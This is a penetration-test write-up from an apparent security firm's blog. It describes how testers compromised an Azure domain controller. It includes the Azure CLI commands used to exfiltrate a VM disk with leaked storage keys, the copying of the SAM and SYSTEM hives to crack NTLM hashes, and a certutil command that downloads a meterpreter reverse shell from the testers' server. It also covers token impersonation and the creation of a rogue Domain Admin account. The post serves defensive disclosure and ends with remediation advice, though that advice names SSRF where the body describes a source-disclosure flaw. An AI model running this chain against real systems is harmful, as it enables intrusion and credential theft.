Menú Security Signal

March 4, 2020

How I Hacked a Domain Controller in Azure during a Penetration Test.

by Federico Fernandez

Prologue

Throughout this post, I am going to tell you about one of the adventures that the assessment team had during a penetration testing of an Azure located infrastructure.

Azure is a cloud service offered by Microsoft, which provides the user with different services to manage and create Virtual Machines, App Services, Create Storage Accounts, etc. It is widely used by many companies looking to obtain a scalable infrastructure based on windows servers.

During this post, it will be shown how it was possible to obtain Domain Admin privileges over a Domain Controller hosted in Azure. The attached information (images, commands), correspond to a real case, which for privacy reasons will be censored to safeguard the identity of our client.

Disclosed Storage Keys

Within the scope agreed by the client, the assessment team found a Full Source Disclosure vulnerability in an app service.

Through this vulnerability, it was possible to access the web.config file which was in the following path: “D:/home/site/wwwroot/web.config

In the information found in the configuration file, the assessment team was able to obtain the credentials of the Storage Account “app01disks“.

An Azure Storage Account, as the name implies, serves to store different types of data, among which can be found, data of type blobs, files, queues, tables, and disks. In certain cases a Storage Account can be used to store Virtual Hard Disks belonging to active Virtual Machines. To have a basic idea, a Storage Account is similar to the Amazon S3 service.

Using the credentials of the Storage Account, it was possible to list the containers within the storage. For this, the Azure CLI tool was used.

Interacting with the Storage

Azure CLI is a command line tool to manage Azure Resources. This tool allows the user to interact with azure services from the command console, through this it is possible to create and manage Virtual Machines, Storage Accounts, and the different services that allow us to administer from Azure Portal.

First we proceeded to list the containers that were inside the Storage Account app01disks.

$ az storage container list --account-key DISCLOSED_KEY --account-name app01disks

As can be seen in the previous image, a blob container with the name “vhds” was found.

The next step was to list the blob files that were inside the container.

$ az storage blob list --container-name vhds --account-key DISCLOSED_KEY --account-name app01disks

The existence of the file “SERVER0120191203162227.vhd” was detected, which is a Virtual Hard Disk and could contain very useful information, such as the NTLM hashes used in the Virtual Machine.

Next, the VHD file was downloaded.

$ az storage blob download --container-name vhds --account-key DISCLOSED_KEY --account-name app01disks --name SERVER0120191203162227.vhd --file SERVER0120191203162227.vhd

As can be seen, at the time of downloading the VHD, the assessment team encountered an error, since the blob file was being used by the system. Therefore, we proceeded to create a snapshot of the VHD, in order to download it.

$ az storage blob snapshot --name SERVER0120191203162227.vhd --container-name vhds --account-key DISCLOSED_KEY --account-name app01disks

In this way it was possible to download the VHD file without any problems.

$ az storage blob download --container-name vhds --account-key DISCLOSED_KEY --account-name app01disks --name SERVER0120191203162227.vhd --file SERVER0120191203162227.vhd --snapshot 2019-12-03T22:05:53.1641082Z

The –snapshot argument indicated the name of the snapshot created previously.

Diving in the disk

Once the Virtual Hard Disk was downloaded, the guestmount tool was used to mount it and access the disk content.

$ mkdir /mnt/vhd

$ guestmount --add SERVER0120191203162227.vhd --inspector --ro /mnt/vhd

The next step was to access the mounted VHD and extract the SAM and SYSTEM files necessary to perform a dump of the NTLM hashes of the system.

[email protected]:/mnt/vhd/Windows/System32/config# cp SAM /root/SAM
[email protected]:/mnt/vhd/Windows/System32/config# cp SYSTEM /root/SYSTEM

Using the samdump2 tool it was possible to obtain the NTLM hash of the user server01.

As can be seen in the following image, a cracking of the password was done through the John The Ripper tool, being able to obtain the credentials of the server01 user.

The assessment team used the credentials to access through RDP to one of the servers that were within the scope agreed by the client.

Compromising a server

Once inside the compromised machine, it was determined that it belonged to the domain controller “DOMAIN.internal“, but it was not possible to access the domain information since the compromised user belonged to a local user.

In order to raise privileges within the server, a Reverse Shell from meterpreter was generated and downloaded to the compromised server, using the “certutil” tool.

$ certutil -urlcache -split -f http://assessment-team-server/reverse.exe

The reverse.exe binary was executed and a meterpreter session was obtained on the assessment team server.

Escalating to Domain Admin

Through the incognito tool, the tokens were listed, being able to obtain the user token DOMAIN\Admin01. The token was impersonated to obtain user privileges, which belonged to the “Domain Admins” group.

Finally, as usual, the SecSignal user was created within the domain and added it to the “Domain Admins” group.

Remediations

  • As a first step, it is advisable to correct certain vulnerabilities that may allow an attacker to access sensitive information on the server side. In this case, it was possible to access Storage Keys through a vulnerability of SSRF (Server-Side Request Forgery). It is recommended to sanitize the parameters that interact with URLs internally, it is recommended to apply a filtering rule that limits only the URLs belonging to the application.
  • It is recommended to regenerate the storage account keys regularly.
  • Apply security policies, such as: Shared Access Signatures (SAS), to limit access to the storage account. In addition, assign an expiration time to SAS URLs.

References